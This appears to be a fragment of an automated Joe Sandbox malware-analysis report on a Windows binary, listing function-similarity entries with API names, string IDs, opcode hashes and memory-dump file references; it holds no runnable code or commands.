                                                                        • Opcode ID: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                        • Instruction ID: 552da836c9724e8f6527e7ff515c7db6cd9204efa10df30d585c1f82a777ad52
                                                                        • Opcode Fuzzy Hash: e2ae8e70be2f5b84d83463abcc11da4b251e2e09d7ca6408d5f9779cbd984f2d
                                                                        • Instruction Fuzzy Hash: 4DF06D10F5864282FB541BBEB84827912567F4C78EFC49030CB4AC22B2DD7DA49A8640
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                        • String ID: .lnk
                                                                        • API String ID: 948891078-24824748
                                                                        • Opcode ID: 1644c63e6644db44a76a731fbb9fe4e004201a8adca6fd1ac56005c9bc23a529
                                                                        • Instruction ID: c73bc5303e331d365e1e18cc52cfcd72f47281ff551fd50111d7c5aa75d49352
                                                                        • Opcode Fuzzy Hash: 1644c63e6644db44a76a731fbb9fe4e004201a8adca6fd1ac56005c9bc23a529
                                                                        • Instruction Fuzzy Hash: 4ED16162B18B4691EB10DF29D4946AD6B60FB89B8CF405031EF4E87B75EE3CE549CB40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                        • String ID: .lnk
                                                                        • API String ID: 3769357847-24824748
                                                                        • Opcode ID: 4c8fcdb31f72f3120188c1de4036b50eaf24b17eb573960d77c147c030cdfb14
                                                                        • Instruction ID: a018632c14e3384eecd3ed078d46ac6407a86bc2a0b4118e879d1ce9d712ef54
                                                                        • Opcode Fuzzy Hash: 4c8fcdb31f72f3120188c1de4036b50eaf24b17eb573960d77c147c030cdfb14
                                                                        • Instruction Fuzzy Hash: 59D14B76B08A5685EB10DF6AD0902AD37B0FB88B8CB445032DF5E97B65DF39E849C740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                        • API String ID: 3215553584-1196891531
                                                                        • Opcode ID: 77144706097a283061aa6841737fd5fc45152d0aa2c4d7c8d9b1e627f9bd4a8a
                                                                        • Instruction ID: ed292566daa57e3db516d14f7835a9518fcf23c34f3af11491e4e8e2cb104f7b
                                                                        • Opcode Fuzzy Hash: 77144706097a283061aa6841737fd5fc45152d0aa2c4d7c8d9b1e627f9bd4a8a
                                                                        • Instruction Fuzzy Hash: 95816A72E082028AFB655F1D969837D26A8BF1978CF158039DB0FD36E0DF6DE960D601
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: $*
                                                                        • API String ID: 3215553584-3982473090
                                                                        • Opcode ID: db61ebb86adcfd651309e33ba306c402ee314aa11931134a2a7a81ecab3a0501
                                                                        • Instruction ID: d45138133d3391e4ee6eeb2a1a7424096991fadf44b86ca1da56c353cfb0f40b
                                                                        • Opcode Fuzzy Hash: db61ebb86adcfd651309e33ba306c402ee314aa11931134a2a7a81ecab3a0501
                                                                        • Instruction Fuzzy Hash: 9261317291C2428AE7698F2D805537E37A1FB5DB1DF249135C74AC62A9CF2CE541DF01
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        • Opcode ID: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                        • Instruction ID: 1f77b428f0f7320d78e9321ca1addf582227fb3b5000b6a6d386fe24dc9c2ba8
                                                                        • Opcode Fuzzy Hash: 8590b3572ee50005f206f958431262ef9082a01c97b701578a5c0a82d3af5d25
                                                                        • Instruction Fuzzy Hash: AA519E7761868192E720DF5AE8849AAB760F7C8BC8F451036EF8D93B69DE7CD505CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                        • String ID: U
                                                                        • API String ID: 2456169464-4171548499
                                                                        • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                        • Instruction ID: c72fb005aaeeb6ff06c5b1ecd5ac754c41db040ae26541e26b8bd8599103a89e
                                                                        • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                                        • Instruction Fuzzy Hash: 7F419122A1964186EB20CF19E4443BA77A1FB8C799F804131EF8E877A8DF7CD441C744
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long
                                                                        • String ID: SysTreeView32
                                                                        • API String ID: 847901565-1698111956
                                                                        • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                        • Instruction ID: c746177b3fa096654e550c85cfb5dd9b6a142428f4a1b345b56d47bc7772ab8b
                                                                        • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                                        • Instruction Fuzzy Hash: 7F414F326097D186E7708F18E444B9A77A1F789764F144335DBA887AA8CF3CD845CF40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateObjectStock
                                                                        • String ID: SysMonthCal32
                                                                        • API String ID: 2671490118-1439706946
                                                                        • Opcode ID: a35748cbb4f7d20bc5763ff5a18e4d80cc8b65d6717278039b9a5fd016896ec3
                                                                        • Instruction ID: d175d9dbebdae7a782a918265af88e44a382ef2e7d5d3e7a23045b993e7b8c39
                                                                        • Opcode Fuzzy Hash: a35748cbb4f7d20bc5763ff5a18e4d80cc8b65d6717278039b9a5fd016896ec3
                                                                        • Instruction Fuzzy Hash: 4D416D326086C28BE370CF59E444B5AB7A0F788794F504235EB9987AA9DF3CD485CF40
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                                        • String ID: msctls_updown32
                                                                        • API String ID: 1752125012-2298589950
                                                                        • Opcode ID: 3ad8a05af1a04f4639f3558a706eda2379b4f54061b6a2bc35ec0bb5bf7c66ed
                                                                        • Instruction ID: 50867221a1f160b058d9098744c85562e52e49bf143fd1dcbd44d01675678f1b
                                                                        • Opcode Fuzzy Hash: 3ad8a05af1a04f4639f3558a706eda2379b4f54061b6a2bc35ec0bb5bf7c66ed
                                                                        • Instruction Fuzzy Hash: 74318232A18B8596EB60CF19E4403AA7361FBC9B95F108136DB8D87B69CF3CD445CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$InformationVolume
                                                                        • String ID: %lu
                                                                        • API String ID: 2507767853-685833217
                                                                        • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                        • Instruction ID: bf77c90045bbe0bd1ddec1d202a59069828f0b90d916c1250311884947a5ca9b
                                                                        • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                                        • Instruction Fuzzy Hash: CD313B72608B8696EA10DB1AE4801ADB7A1FB8DB88F404035EB8D83B75DF7CD595CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: msctls_trackbar32
                                                                        • API String ID: 1025951953-1010561917
                                                                        • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                        • Instruction ID: 977ed222c7c7e8d5f1fd8820e3939ed5a7fa29874177ddeb54b1464797b7b8c2
                                                                        • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                                        • Instruction Fuzzy Hash: F331F832A1868587E760CF19F444B5AB7A1FB88B94F144235EB9883B65CF3CD845CF04
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                                        • String ID: %s%d
                                                                        • API String ID: 2330185562-1110647743
                                                                        • Opcode ID: 857964eeb1744f33fa59f7157a8d227542009ecfa466120d8aa32e1a6fda710b
                                                                        • Instruction ID: 61bf927cf45049dd92683359f447b16898da46c6256a4ccb6a77b24159e09b68
                                                                        • Opcode Fuzzy Hash: 857964eeb1744f33fa59f7157a8d227542009ecfa466120d8aa32e1a6fda710b
                                                                        • Instruction Fuzzy Hash: 7B216D21B08B8292EA14DB2AE8442FA6361FB4DBC8F544132DF9D87776DE2CE205C710
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                        • String ID: 0
                                                                        • API String ID: 33631002-4108050209
                                                                        • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                        • Instruction ID: 62bc5a7f76357524015a802c5c99920caa50c139d9e7a40e3472bceb1055f2a1
                                                                        • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                                        • Instruction Fuzzy Hash: A3218332618B80C6D3608F25F48469A77B4F788794F544236EB9D43B94DF3CD655CB00
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BB182DD1), ref: 00007FF6BB1BAF37
                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6BB182DD1), ref: 00007FF6BB1BAF4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                        • API String ID: 2574300362-1816364905
                                                                        • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                        • Instruction ID: fb2a518dbf1053ba38f048e603ca75da096d015b5b4f8673e9c6fbc7d3b75b7b
                                                                        • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                                        • Instruction Fuzzy Hash: 13F0AC62A16B0692EF18CB58E49436823E4FB1CB4DF940439CA5D86374EF7CD658C340
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                        • API String ID: 2574300362-199464113
                                                                        • Opcode ID: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                        • Instruction ID: 57ef6993eb2379d575f597c2d895364e947ac4709ca70cda73a67cf1a0a5464e
                                                                        • Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
                                                                        • Instruction Fuzzy Hash: 51E01A22906B0692FF148B28E85477823E0FB0CB4CF840439DA1D86374EFBCDAA9D300
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-1355242751
                                                                        • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                        • Instruction ID: c79bc57a58fda16b84bf94d10a4b272dfa0d57c09cabe5e05e64c1cb3f456f52
                                                                        • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                                        • Instruction Fuzzy Hash: 02E0C921905B0A92EB159B18E4543A823A0BB0CB4CF540434CA5D853B4EF7CD694C200
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                        • API String ID: 2574300362-4033151799
                                                                        • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                        • Instruction ID: 5453187bf35054e32ad268a4591600c06ad48f691510772e14eb14393d9ece53
                                                                        • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                                        • Instruction Fuzzy Hash: 0AE0E526A06B06D2FF14CB28E45436823A0FB0DB5DF480435CA1D8A374EFBCD6A9C340
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                        • API String ID: 2574300362-3689287502
                                                                        • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                        • Instruction ID: ff2363399d53341a53852030347561bf09aff6201aece978eba77daab9980d99
                                                                        • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                        • Instruction Fuzzy Hash: BBE0C961906F0A92EB149F19E45436823A5BB0CB4CF540435CA5D853A0EF7CE694C240
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
